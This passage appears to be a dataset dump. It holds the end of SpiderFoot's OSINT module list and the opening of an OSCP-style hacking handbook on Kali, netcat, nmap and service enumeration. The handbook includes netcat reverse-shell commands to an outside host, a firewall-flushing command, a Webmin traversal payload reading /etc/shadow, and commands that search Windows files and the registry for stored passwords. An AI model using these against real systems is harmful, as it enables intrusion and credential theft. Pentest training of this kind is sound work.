errors, etc.|\nsfp_ethereum.py|Ethereum Finder|Identify ethereum addresses in scraped webpages.|\nsfp_filemeta.py|File Metadata|Extracts meta data from documents and images.|\nsfp_flickr.py|Flickr|Look up e-mail addresses on Flickr.|\nsfp_fortinet.py|Fortiguard.com|Check if an IP is malicious according to Fortiguard.com.|\nsfp_fraudguard.py|Fraudguard|Obtain threat information from Fraudguard.io|\nsfp_fringeproject.py|Fringe Project|Obtain network information from Fringe Project API.|\nsfp_fsecure_riddler.py|F-Secure Riddler.io|Obtain network information from F-Secure Riddler.io API.|\nsfp_fullcontact.py|FullContact|Gather domain and e-mail information from fullcontact.com.|\nsfp_github.py|Github|Identify associated public code repositories on Github.|\nsfp_googlemaps.py|Google Maps|Identifies potential physical addresses and latitude/longitude coordinates.|\nsfp_googlesearch.py|Google|Obtain information from the Google Custom Search API to identify sub-domains and links.|\nsfp_gravatar.py|Gravatar|Retrieve user information from Gravatar API.|\nsfp_greynoise.py|Greynoise|Obtain information from Greynoise.io's Enterprise API.|\nsfp_h1nobbdde.py|HackerOne (Unofficial)|Check external vulnerability scanning/reporting service h1.nobbd.de to see if the target is listed.|\nsfp_hackertarget.py|HackerTarget.com|Search HackerTarget.com for hosts sharing the same IP.|\nsfp_haveibeenpwned.py|HaveIBeenPwned|Check HaveIBeenPwned.com for hacked e-mail addresses identified in breaches.|\nsfp_honeypot.py|Honeypot Checker|Query the projecthoneypot.org database for entries.|\nsfp_hosting.py|Hosting Providers|Find out if any IP addresses identified fall within known 3rd party hosting ranges, e.g. Amazon, Azure, etc.|\nsfp_hostsfilenet.py|hosts-file.net Malicious Hosts|Check if a host/domain is malicious according to hosts-file.net Malicious Hosts.|\nsfp_hunter.py|Hunter.io|Check for e-mail addresses and names on hunter.io.|\nsfp_iknowwhatyoudownload.py|Iknowwhatyoudownload.com|Check iknowwhatyoudownload.com for IP addresses that have been using BitTorrent.|\nsfp_instagram.py|Instagram|Gather information from Instagram profiles.|\nsfp_intelx.py|IntelligenceX|Obtain information from IntelligenceX about identified IP addresses, domains, e-mail addresses and phone numbers.|\nsfp_intfiles.py|Interesting Files|Identifies potential files of interest, e.g. office documents, zip files.|\nsfp_ipinfo.py|IPInfo.io|Identifies the physical location of IP addresses identified using ipinfo.io.|\nsfp_ipstack.py|ipstack|Identifies the physical location of IP addresses identified using ipstack.com.|\nsfp_isc.py|Internet Storm Center|Check if an IP is malicious according to SANS ISC.|\nsfp_junkfiles.py|Junk Files|Looks for old/temporary and other similar files.|\nsfp_malwaredomainlist.py|malwaredomainlist.com|Check if a host/domain, IP or netblock is malicious according to malwaredomainlist.com.|\nsfp_malwaredomains.py|malwaredomains.com|Check if a host/domain is malicious according to malwaredomains.com.|\nsfp_malwarepatrol.py|MalwarePatrol|Searches malwarepatrol.net's database of malicious URLs/IPs.|\nsfp_metadefender.py|MetaDefender|Search MetaDefender API for IP address and domain IP reputation.|\nsfp_mnemonic.py|Mnemonic PassiveDNS|Obtain Passive DNS information from PassiveDNS.mnemonic.no.|\nsfp_multiproxy.py|multiproxy.org Open Proxies|Check if an IP is an open proxy according to multiproxy.org' open proxy list.|\nsfp_myspace.py|MySpace|Gather username and location from MySpace.com profiles.|\nsfp_names.py|Name Extractor|Attempt to identify human names in fetched content.|\nsfp_neutrinoapi.py|NeutrinoAPI|Search NeutrinoAPI for IP address info and check IP reputation.|\nsfp_norton.py|Norton ConnectSafe|Check if a host would be blocked by Norton ConnectSafe DNS|\nsfp_nothink.py|Nothink.org|Check if a host/domain, netblock or IP is malicious according to Nothink.org.|\nsfp_numpi.py|numpi|Lookup USA/Canada phone number location and carrier information from numpi.com.|\nsfp_numverify.py|numverify|Lookup phone number location and carrier information from numverify.com.|\nsfp_onioncity.py|Onion.link|Search Tor 'Onion City' search engine for mentions of the target domain.|\nsfp_onionsearchengine.py|Onionsearchengine.com|Search Tor onionsearchengine.com for mentions of the target domain.|\nsfp_openbugbounty.py|Open Bug Bounty|Check external vulnerability scanning/reporting service openbugbounty.org to see if the target is listed.|\nsfp_opencorporates.py|OpenCorporates|Look up company information from OpenCorporates.|\nsfp_opendns.py|OpenDNS|Check if a host would be blocked by OpenDNS DNS|\nsfp_openphish.py|OpenPhish|Check if a host/domain is malicious according to OpenPhish.com.|\nsfp_openstreetmap.py|OpenStreetMap|Retrieves latitude/longitude coordinates for physical addresses from OpenStreetMap API.|\nsfp_pageinfo.py|Page Info|Obtain information about web pages (do they take passwords, do they contain forms, etc.)|\nsfp_pastebin.py|PasteBin|PasteBin scraping (via Google) to identify related content.|\nsfp_pgp.py|PGP Key Look-up|Look up e-mail addresses in PGP public key servers.|\nsfp_phishtank.py|PhishTank|Check if a host/domain is malicious according to PhishTank.|\nsfp_phone.py|Phone Numbers|Identify phone numbers in scraped webpages.|\nsfp_portscan_tcp.py|Port Scanner - TCP|Scans for commonly open TCP ports on Internet-facing systems.|\nsfp_psbdmp.py|Psbdmp.com|Check psbdmp.cc (PasteBin Dump) for potentially hacked e-mails and domains.|\nsfp_pulsedive.py|Pulsedive|Obtain information from Pulsedive's API.|\nsfp_quad9.py|Quad9|Check if a host would be blocked by Quad9|\nsfp_ripe.py|RIPE|Queries the RIPE registry (includes ARIN data) to identify netblocks and other info.|\nsfp_riskiq.py|RiskIQ|Obtain information from RiskIQ's (formerly PassiveTotal) Passive DNS and Passive SSL databases.|\nsfp_robtex.py|Robtex|Search Robtex.com for hosts sharing the same IP.|\nsfp_s3bucket.py|Amazon S3 Bucket Finder|Search for potential Amazon S3 buckets associated with the target and attempt to list their contents.|\nsfp_scylla.py|Scylla|Gather breach data from Scylla API.|\nsfp_securitytrails.py|SecurityTrails|Obtain Passive DNS and other information from SecurityTrails|\nsfp_shodan.py|SHODAN|Obtain information from SHODAN about identified IP addresses.|\nsfp_similar.py|Similar Domains|Search various sources to identify similar looking domain names, for instance squatted domains.|\nsfp_skymem.py|Skymem|Look up e-mail addresses on Skymem.|\nsfp_slideshare.py|SlideShare|Gather name and location from SlideShare profiles.|\nsfp_socialprofiles.py|Social Media Profiles|Tries to discover the social media profiles for human names identified.|\nsfp_social.py|Social Networks|Identify presence on social media networks such as LinkedIn, Twitter and others.|\nsfp_sorbs.py|SORBS|Query the SORBS database for open relays, open proxies, vulnerable servers, etc.|\nsfp_spamcop.py|SpamCop|Query various spamcop databases for open relays, open proxies, vulnerable servers, etc.|\nsfp_spamhaus.py|Spamhaus|Query the Spamhaus databases for open relays, open proxies, vulnerable servers, etc.|\nsfp_spider.py|Spider|Spidering of web-pages to extract content for searching.|\nsfp_spyonweb.py|SpyOnWeb|Search SpyOnWeb for hosts sharing the same IP address, Google Analytics code, or Google Adsense code.|\nsfp_sslcert.py|SSL Certificates|Gather information about SSL certificates used by the target's HTTPS sites.|\nsfp_ssltools.py|SSL Tools|Gather information about SSL certificates from SSLTools.com.|\nsfp__stor_db.py|Storage|Stores scan results into the back-end SpiderFoot database. You will need this.|\nsfp__stor_stdout.py|Command-line output|Dumps output to standard out. Used for when a SpiderFoot scan is run via the command-line.|\nsfp_strangeheaders.py|Strange Headers|Obtain non-standard HTTP headers returned by web servers.|\nsfp_talosintel.py|Talos Intelligence|Check if a netblock or IP is malicious according to talosintelligence.com.|\nsfp_threatcrowd.py|ThreatCrowd|Obtain information from ThreatCrowd about identified IP addresses, domains and e-mail addresses.|\nsfp_threatexpert.py|ThreatExpert.com|Check if a host/domain or IP is malicious according to ThreatExpert.com.|\nsfp_threatminer.py|ThreatMiner|Obtain information from ThreatMiner's database for passive DNS and threat intelligence.|\nsfp_tldsearch.py|TLD Search|Search all Internet TLDs for domains with the same name as the target (this can be very slow.)|\nsfp_tool_cmseek.py|Tool - CMSeeK|Identify what Content Management System (CMS) might be used.|\nsfp_tool_dnstwist.py|Tool - DNSTwist|Identify bit-squatting, typo and other similar domains to the target using a local DNSTwist installation.|\nsfp_tool_whatweb.py|Tool - WhatWeb|Identify what software is in use on the specified website.|\nsfp_torch.py|TORCH|Search Tor 'TORCH' search engine for mentions of the target domain.|\nsfp_torexits.py|TOR Exit Nodes|Check if an IP or netblock appears on the torproject.org exit node list.|\nsfp_totalhash.py|TotalHash.com|Check if a host/domain or IP is malicious according to TotalHash.com.|\nsfp_twitter.py|Twitter|Gather name and location from Twitter profiles.|\nsfp_uceprotect.py|UCEPROTECT|Query the UCEPROTECT databases for open relays, open proxies, vulnerable servers, etc.|\nsfp_urlscan.py|URLScan.io|Search URLScan.io cache for domain information.|\nsfp_venmo.py|Venmo|Gather user information from Venmo API.|\nsfp_viewdns.py|ViewDNS.info|Reverse Whois lookups using ViewDNS.info.|\nsfp_virustotal.py|VirusTotal|Obtain information from VirusTotal about identified IP addresses.|\nsfp_voipbl.py|VoIPBL OpenPBX IPs|Check if an IP or netblock is an open PBX according to VoIPBL OpenPBX IPs.|\nsfp_vxvault.py|VXVault.net|Check if a domain or IP is malicious according to VXVault.net.|\nsfp_watchguard.py|Watchguard|Check if an IP is malicious according to Watchguard's reputationauthority.org.|\nsfp_webanalytics.py|Web Analytics|Identify web analytics IDs in scraped webpages and DNS TXT records.|\nsfp_webframework.py|Web Framework|Identify the usage of popular web frameworks like jQuery, YUI and others.|\nsfp_webserver.py|Web Server|Obtain web server banners to identify versions of web servers being used.|\nsfp_whatcms.py|WhatCMS|Check web technology using WhatCMS.org API.|\nsfp_whoisology.py|Whoisology|Reverse Whois lookups using Whoisology.com.|\nsfp_whois.py|Whois|Perform a WHOIS look-up on domain names and owned netblocks.|\nsfp_whoxy.py|Whoxy|Reverse Whois lookups using Whoxy.com.|\nsfp_wigle.py|Wigle.net|Query wigle.net to identify nearby WiFi access points.|\nsfp_wikileaks.py|Wikileaks|Search Wikileaks for mentions of domain names and e-mail addresses.|\nsfp_wikipediaedits.py|Wikipedia Edits|Identify edits to Wikipedia articles made from a given IP address or username.|\nsfp_xforce.py|XForce Exchange|Obtain information from IBM X-Force Exchange|\nsfp_yandexdns.py|Yandex DNS|Check if a host would be blocked by Yandex DNS|\nsfp_zoneh.py|Zone-H Defacement Check|Check if a hostname/domain appears on the zone-h.org 'special defacements' RSS feed.|\n\n### DOCUMENTATION\n\nRead more at the [project website](https://www.spiderfoot.net/r.php?u=aHR0cHM6Ly93d3cuc3BpZGVyZm9vdC5uZXQv&s=os_gh), including more complete documentation, blog posts with tutorials/guides, plus information about [SpiderFoot HX](https://www.spiderfoot.net/r.php?u=aHR0cHM6Ly93d3cuc3BpZGVyZm9vdC5uZXQvaHgvCg==&s=os_gh).\n\nLatest updates announced on [Twitter](https://twitter.com/spiderfoot).\n"}}},{"rowIdx":554,"cells":{"text":{"kind":"string","value":"# wired-courtyard\n*Handbook and survival guide for hacking over the wire, OSCP-style*\n\n
\n\n ***UPDATE: October 4, 2017***\nFor OSCP Lab machine enumeration automation, checkout my other project: **VANQUISH**\n\nVanquish is a Kali Linux based Enumeration Orchestrator written in Python. Vanquish leverages the opensource enumeration tools on Kali to perform multiple active information gathering phases. The results of each phase are fed into the next phase to identify vulnerabilities that could be leveraged for a remote shell.\n \n https://github.com/frizb/Vanquish\n\n**NOTE: This document refers to the target ip as the export variable $ip.** \n \n **To set this value on the command line use the following syntax:**\n \n **export ip=192.168.1.100**\n\n## Table of Contents\n- [Kali Linux](#kali-linux)\n- [Information Gathering & Vulnerability Scanning](#information-gathering--vulnerability-scanning)\n * [Passive Information Gathering](#passive-information-gathering)\n * [Active Information Gathering](#active-information-gathering)\n * [Port Scanning](#port-scanning)\n * [Enumeration](#enumeration)\n * [HTTP Enumeration](#http-enumeration)\n- [Buffer Overflows and Exploits](#buffer-overflows-and-exploits)\n- [Shells](#shells)\n- [File Transfers](#file-transfers)\n- [Privilege Escalation](#privilege-escalation)\n * [Linux Privilege Escalation](#linux-privilege-escalation)\n * [Windows Privilege Escalation](#windows-privilege-escalation)\n- [Client, Web and Password Attacks](#client-web-and-password-attacks)\n * [Client Attacks](#client-attacks)\n * [Web Attacks](#web-attacks)\n * [File Inclusion Vulnerabilities LFI/RFI](#file-inclusion-vulnerabilities)\n * [Database Vulnerabilities](#database-vulnerabilities)\n * [Password Attacks](#password-attacks)\n * [Password Hash Attacks](#password-hash-attacks)\n- [Networking, Pivoting and Tunneling](#networking-pivoting-and-tunneling)\n- [The Metasploit Framework](#the-metasploit-framework)\n- [Bypassing Antivirus Software](#bypassing-antivirus-software)\n\nKali Linux\n========================================================================================================\n\n- Set the Target IP Address to the `$ip` system variable \n `export ip=192.168.1.100`\n\n- Find the location of a file \n `locate sbd.exe`\n\n- Search through directories in the `$PATH` environment variable \n `which sbd`\n\n- Find a search for a file that contains a specific string in it’s\n name: \n `find / -name sbd\\*`\n\n- Show active internet connections \n `netstat -lntp`\n\n- Change Password \n `passwd`\n\n- Verify a service is running and listening \n `netstat -antp |grep apache`\n\n- Start a service \n `systemctl start ssh `\n \n `systemctl start apache2`\n\n- Have a service start at boot \n `systemctl enable ssh`\n\n- Stop a service \n `systemctl stop ssh`\n\n- Unzip a gz file \n `gunzip access.log.gz`\n\n- Unzip a tar.gz file \n `tar -xzvf file.tar.gz`\n\n- Search command history \n `history | grep phrase_to_search_for`\n\n- Download a webpage \n `wget http://www.cisco.com`\n\n- Open a webpage \n `curl http://www.cisco.com`\n\n- String manipulation\n\n - Count number of lines in file \n `wc -l index.html`\n\n - Get the start or end of a file \n `head index.html`\n \n `tail index.html`\n\n - Extract all the lines that contain a string \n `grep \"href=\" index.html`\n\n - Cut a string by a delimiter, filter results then sort \n `grep \"href=\" index.html | cut -d \"/\" -f 3 | grep \"\\\\.\" | cut -d '\"' -f 1 | sort -u`\n\n - Using Grep and regular expressions and output to a file \n `cat index.html | grep -o 'http://\\[^\"\\]\\*' | cut -d \"/\" -f 3 | sort –u > list.txt`\n\n - Use a bash loop to find the IP address behind each host \n `for url in $(cat list.txt); do host $url; done`\n\n - Collect all the IP Addresses from a log file and sort by\n frequency \n `cat access.log | cut -d \" \" -f 1 | sort | uniq -c | sort -urn`\n\n- Decoding using Kali\n\n - Decode Base64 Encoded Values\n \n `echo -n \"QWxhZGRpbjpvcGVuIHNlc2FtZQ==\" | base64 --decode`\n\n - Decode Hexidecimal Encoded Values \n `echo -n \"46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874\" | xxd -r -ps`\n\n- Netcat - Read and write TCP and UDP Packets\n\n - Download Netcat for Windows (handy for creating reverse shells and transfering files on windows systems):\n [https://joncraton.org/blog/46/netcat-for-windows/](https://joncraton.org/blog/46/netcat-for-windows/)\n\n - Connect to a POP3 mail server \n `nc -nv $ip 110`\n\n - Listen on TCP/UDP port \n `nc -nlvp 4444`\n\n - Connect to a netcat port \n `nc -nv $ip 4444`\n\n - Send a file using netcat \n `nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe`\n\n - Receive a file using netcat \n `nc -nlvp 4444 > incoming.exe`\n \n - Some OSs (OpenBSD) will use nc.traditional rather than nc so watch out for that...\n \n whereis nc\n nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz\n\n /bin/nc.traditional -e /bin/bash 1.2.3.4 4444\n\n\n - Create a reverse shell with Ncat using cmd.exe on Windows \n `nc.exe -nlvp 4444 -e cmd.exe`\n \n or\n \n `nc.exe -nv -e cmd.exe`\n\n - Create a reverse shell with Ncat using bash on Linux \n `nc -nv $ip 4444 -e /bin/bash`\n \n - Netcat for Banner Grabbing:\n \n `echo \"\" | nc -nv -w1 `\n\n- Ncat - Netcat for Nmap project which provides more security avoid\n IDS\n\n - Reverse shell from windows using cmd.exe using ssl \n `ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl`\n\n - Listen on port 4444 using ssl \n `ncat -v $ip 4444 --ssl`\n\n- Wireshark\n - Show only SMTP (port 25) and ICMP traffic:\n \n `tcp.port eq 25 or icmp`\n \n - Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet:\n \n `ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16`\n \n - Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs:\n \n `ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip`\n \n - Some commands are equal\n \n `ip.addr == xxx.xxx.xxx.xxx`\n \n Equals\n \n `ip.src == xxx.xxx.xxx.xxx or ip.dst == xxx.xxx.xxx.xxx `\n\n ` ip.addr != xxx.xxx.xxx.xxx`\n \n Equals\n \n `ip.src != xxx.xxx.xxx.xxx or ip.dst != xxx.xxx.xxx.xxx`\n\n- Tcpdump\n\n - Display a pcap file \n `tcpdump -r passwordz.pcap`\n\n - Display ips and filter and sort \n `tcpdump -n -r passwordz.pcap | awk -F\" \" '{print $3}' | sort -u | head`\n\n - Grab a packet capture on port 80 \n `tcpdump tcp port 80 -w output.pcap -i eth0`\n\n - Check for ACK or PSH flag set in a TCP packet \n `tcpdump -A -n 'tcp[13] = 24' -r passwordz.pcap`\n\n- IPTables \n\n - Deny traffic to ports except for Local Loopback\n\n `iptables -A INPUT -p tcp --destination-port 13327 ! -d $ip -j DROP `\n \n `iptables -A INPUT -p tcp --destination-port 9991 ! -d $ip -j DROP`\n\n - Clear ALL IPTables firewall rules\n \n ```bash\n iptables -P INPUT ACCEPT\n iptables -P FORWARD ACCEPT\n iptables -P OUTPUT ACCEPT\n iptables -t nat -F\n iptables -t mangle -F\n iptables -F\n iptables -X\n iptables -t raw -F iptables -t raw -X\n ```\n\nInformation Gathering & Vulnerability Scanning\n===================================================================================================================================\n\n- Passive Information Gathering\n ---------------------------------------------------------------------------------------------------------------------------\n\n- Google Hacking\n\n - Google search to find website sub domains \n `site:microsoft.com`\n\n - Google filetype, and intitle \n `intitle:\"netbotz appliance\" \"OK\" -filetype:pdf`\n\n - Google inurl \n `inurl:\"level/15/sexec/-/show\"`\n\n - Google Hacking Database: \n https://www.exploit-db.com/google-hacking-database/\n\n- SSL Certificate Testing \n [https://www.ssllabs.com/ssltest/analyze.html](https://www.ssllabs.com/ssltest/analyze.html)\n\n- Email Harvesting\n\n - Simply Email \n `git clone https://github.com/killswitch-GUI/SimplyEmail.git `\n \n `./SimplyEmail.py -all -e TARGET-DOMAIN`\n\n- Netcraft\n\n - Determine the operating system and tools used to build a site \n https://searchdns.netcraft.com/\n\n- Whois Enumeration \n `whois domain-name-here.com `\n \n `whois $ip`\n\n- Banner Grabbing\n\n - `nc -v $ip 25`\n\n - `telnet $ip 25`\n\n - `nc TARGET-IP 80`\n\n- Recon-ng - full-featured web reconnaissance framework written in Python\n\n - `cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git `\n \n `cd /opt/recon-ng `\n \n `./recon-ng `\n \n `show modules `\n \n `help`\n\n- Active Information Gathering\n --------------------------------------------------------------------------------------------------------------------------\n\n\n\n\n- Port Scanning\n -----------------------------------------------------------------------------------------------------------\n*Subnet Reference Table*\n\n/ | Addresses | Hosts | Netmask | Amount of a Class C\n--- | --- | --- | --- | --- \n/30 | 4 | 2 | 255.255.255.252| 1/64\n/29 | 8 | 6 | 255.255.255.248 | 1/32\n/28 | 16 | 14 | 255.255.255.240 | 1/16\n/27 | 32 | 30 | 255.255.255.224 | 1/8\n/26 | 64 | 62 | 255.255.255.192 | 1/4\n/25 | 128 | 126 | 255.255.255.128 | 1/2\n/24 | 256 | 254 | 255.255.255.0 | 1\n/23 | 512 | 510 | 255.255.254.0 | 2\n/22 | 1024 | 1022 | 255.255.252.0 | 4\n/21 | 2048 | 2046 | 255.255.248.0 | 8\n/20 | 4096 | 4094 | 255.255.240.0 | 16\n/19 | 8192 | 8190 | 255.255.224.0 | 32\n/18 | 16384 | 16382 | 255.255.192.0 | 64\n/17 | 32768 | 32766 | 255.255.128.0 | 128\n/16 | 65536 | 65534 | 255.255.0.0 | 256\n\n - Set the ip address as a variable \n `export ip=192.168.1.100 `\n `nmap -A -T4 -p- $ip`\n\n - Netcat port Scanning \n `nc -nvv -w 1 -z $ip 3388-3390`\n \n - Discover active IPs usign ARP on the network:\n `arp-scan $ip/24`\n\n - Discover who else is on the network \n `netdiscover`\n\n - Discover IP Mac and Mac vendors from ARP \n `netdiscover -r $ip/24`\n\n - Nmap stealth scan using SYN \n `nmap -sS $ip`\n\n - Nmap stealth scan using FIN \n `nmap -sF $ip`\n\n - Nmap Banner Grabbing \n `nmap -sV -sT $ip`\n\n - Nmap OS Fingerprinting \n `nmap -O $ip`\n\n - Nmap Regular Scan: \n `nmap $ip/24`\n\n - Enumeration Scan \n `nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt`\n\n - Enumeration Scan All Ports TCP / UDP and output to a txt file \n `nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip`\n\n - Nmap output to a file: \n `nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24`\n\n - Quick Scan: \n `nmap -T4 -F $ip/24`\n\n - Quick Scan Plus: \n `nmap -sV -T4 -O -F --version-light $ip/24`\n\n - Quick traceroute \n `nmap -sn --traceroute $ip`\n\n - All TCP and UDP Ports \n `nmap -v -sU -sS -p- -A -T4 $ip`\n\n - Intense Scan: \n `nmap -T4 -A -v $ip`\n\n - Intense Scan Plus UDP \n `nmap -sS -sU -T4 -A -v $ip/24`\n\n - Intense Scan ALL TCP Ports \n `nmap -p 1-65535 -T4 -A -v $ip/24`\n\n - Intense Scan - No Ping \n `nmap -T4 -A -v -Pn $ip/24`\n\n - Ping scan \n `nmap -sn $ip/24`\n\n - Slow Comprehensive Scan \n `nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script \"default or (discovery and safe)\" $ip/24`\n\n - Scan with Active connect in order to weed out any spoofed ports designed to troll you \n `nmap -p1-65535 -A -T5 -sT $ip`\n\n- Enumeration\n -----------\n\n- DNS Enumeration\n\n - NMAP DNS Hostnames Lookup\n `nmap -F --dns-server `\n \n - Host Lookup \n `host -t ns megacorpone.com`\n\n - Reverse Lookup Brute Force - find domains in the same range \n `for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v \"not found\"`\n\n - Perform DNS IP Lookup \n `dig a domain-name-here.com @nameserver`\n\n - Perform MX Record Lookup \n `dig mx domain-name-here.com @nameserver`\n\n - Perform Zone Transfer with DIG \n `dig axfr domain-name-here.com @nameserver`\n\n - DNS Zone Transfers \n Windows DNS zone transfer \n \n `nslookup -> set type=any -> ls -d blah.com `\n \n Linux DNS zone transfer \n \n `dig axfr blah.com @ns1.blah.com`\n \n - Dnsrecon DNS Brute Force \n `dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml`\n\n - Dnsrecon DNS List of megacorp \n `dnsrecon -d megacorpone.com -t axfr`\n\n - DNSEnum \n `dnsenum zonetransfer.me`\n\n- NMap Enumeration Script List:\n\n - NMap Discovery \n [*https://nmap.org/nsedoc/categories/discovery.html*](https://nmap.org/nsedoc/categories/discovery.html)\n\n - Nmap port version detection MAXIMUM power \n `nmap -vvv -A --reason --script=\"+(safe or default) and not broadcast\" -p `\n\n\n- NFS (Network File System) Enumeration\n\n - Show Mountable NFS Shares \n `nmap -sV --script=nfs-showmount $ip`\n\n- RPC (Remote Procedure Call) Enumeration\n\n - Connect to an RPC share without a username and password and enumerate privledges\n `rpcclient --user=\"\" --command=enumprivs -N $ip`\n\n - Connect to an RPC share with a username and enumerate privledges\n `rpcclient --user=\"\" --command=enumprivs $ip`\n\n\n- SMB Enumeration\n\n - SMB OS Discovery \n `nmap $ip --script smb-os-discovery.nse`\n\n - Nmap port scan \n `nmap -v -p 139,445 -oG smb.txt $ip-254`\n\n - Netbios Information Scanning \n `nbtscan -r $ip/24`\n\n - Nmap find exposed Netbios servers \n `nmap -sU --script nbstat.nse -p 137 $ip`\n \n - Nmap all SMB scripts scan\n \n `nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip`\n\n - Nmap all SMB scripts authenticated scan\n \n `nmap -sV -Pn -vv -p 445 --script-args smbuser=,smbpass= --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip`\n\n - SMB Enumeration Tools \n `nmblookup -A $ip `\n \n `smbclient //MOUNT/share -I $ip -N `\n \n `rpcclient -U \"\" $ip `\n \n `enum4linux $ip `\n \n `enum4linux -a $ip`\n \n\n - SMB Finger Printing \n `smbclient -L //$ip`\n\n - Nmap Scan for Open SMB Shares \n `nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24`\n\n - Nmap scans for vulnerable SMB Servers \n `nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip`\n\n - Nmap List all SMB scripts installed \n `ls -l /usr/share/nmap/scripts/smb*`\n\n - Enumerate SMB Users\n \n `nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14`\n \n OR \n \n `python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip`\n \n\n - RID Cycling - Null Sessions \n `ridenum.py $ip 500 50000 dict.txt`\n\n - Manual Null Session Testing\n \n Windows: `net use \\\\$ip\\IPC$ \"\" /u:\"\"`\n \n Linux: `smbclient -L //$ip`\n \n\n- SMTP Enumeration - Mail Severs\n\n - Verify SMTP port using Netcat \n `nc -nv $ip 25`\n\n- POP3 Enumeration - Reading other peoples mail - You may find usernames and passwords for email accounts, so here is how to check the mail using Telnet\n\n root@kali:~# telnet $ip 110\n +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready \n USER billydean \n +OK\n PASS password\n +OK Welcome billydean\n \n list\n \n +OK 2 1807\n 1 786\n 2 1021\n \n retr 1\n \n +OK Message follows\n From: jamesbrown@motown.com\n Dear Billy Dean,\n\n Here is your login for remote desktop ... try not to forget it this time!\n username: billydean\n password: PA$$W0RD!Z\n\n\n- SNMP Enumeration -Simple Network Management Protocol\n\n - Fix SNMP output values so they are human readable \n `apt-get install snmp-mibs-downloader download-mibs `\n `echo \"\" > /etc/snmp/snmp.conf`\n\n - SNMP Enumeration Commands\n\n - `snmpcheck -t $ip -c public`\n\n - `snmpwalk -c public -v1 $ip 1|`\n\n - `grep hrSWRunName|cut -d\\* \\* -f`\n\n - `snmpenum -t $ip`\n\n - `onesixtyone -c names -i hosts`\n\n - SNMPv3 Enumeration \n `nmap -sV -p 161 --script=snmp-info $ip/24`\n\n - Automate the username enumeration process for SNMPv3: \n `apt-get install snmp snmp-mibs-downloader `\n `wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb`\n\n - SNMP Default Credentials \n /usr/share/metasploit-framework/data/wordlists/snmp\\_default\\_pass.txt\n\n\n- MS SQL Server Enumeration\n\n - Nmap Information Gathering\n \n `nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip`\n \n- Webmin and miniserv/0.01 Enumeration - Port 10000\n\n Test for LFI & file disclosure vulnerability by grabbing /etc/passwd\n \n `curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd`\n \n Test to see if webmin is running as root by grabbing /etc/shadow\n \n `curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow`\n\n- Linux OS Enumeration\n\n - List all SUID files \n `find / -perm -4000 2>/dev/null`\n\n - Determine the current version of Linux \n `cat /etc/issue`\n\n - Determine more information about the environment \n `uname -a`\n \n - List processes running \n `ps -xaf`\n\n - List the allowed (and forbidden) commands for the invoking use \n `sudo -l`\n\n - List iptables rules \n `iptables --table nat --list \n iptables -vL -t filter \n iptables -vL -t nat \n iptables -vL -t mangle \n iptables -vL -t raw \n iptables -vL -t security`\n\n- Windows OS Enumeration\n\n\n - net config Workstation\n \n - systeminfo | findstr /B /C:\"OS Name\" /C:\"OS Version\"\n \n - hostname\n \n - net users\n \n - ipconfig /all\n \n - route print\n \n - arp -A\n \n - netstat -ano\n \n - netsh firewall show state\t\n \n - netsh firewall show config\n \n - schtasks /query /fo LIST /v\n \n - tasklist /SVC\n \n - net start\n \n - DRIVERQUERY\n \n - reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated\n \n - reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated\n \n - dir /s *pass* == *cred* == *vnc* == *.config*\n \n - findstr /si password *.xml *.ini *.txt\n \n - reg query HKLM /f password /t REG_SZ /s\n \n - reg query HKCU /f password /t REG_SZ /s\n\n- Vulnerability Scanning with Nmap\n\n- Nmap Exploit Scripts \n [*https://nmap.org/nsedoc/categories/exploit.html*](https://nmap.org/nsedoc/categories/exploit.html)\n\n- Nmap search through vulnerability scripts \n `cd /usr/share/nmap/scripts/ \n ls -l \\*vuln\\*`\n\n- Nmap search through Nmap Scripts for a specific keyword \n `ls /usr/share/nmap/scripts/\\* | grep ftp`\n\n- Scan for vulnerable exploits with nmap \n `nmap --script exploit -Pn $ip`\n\n- NMap Auth Scripts 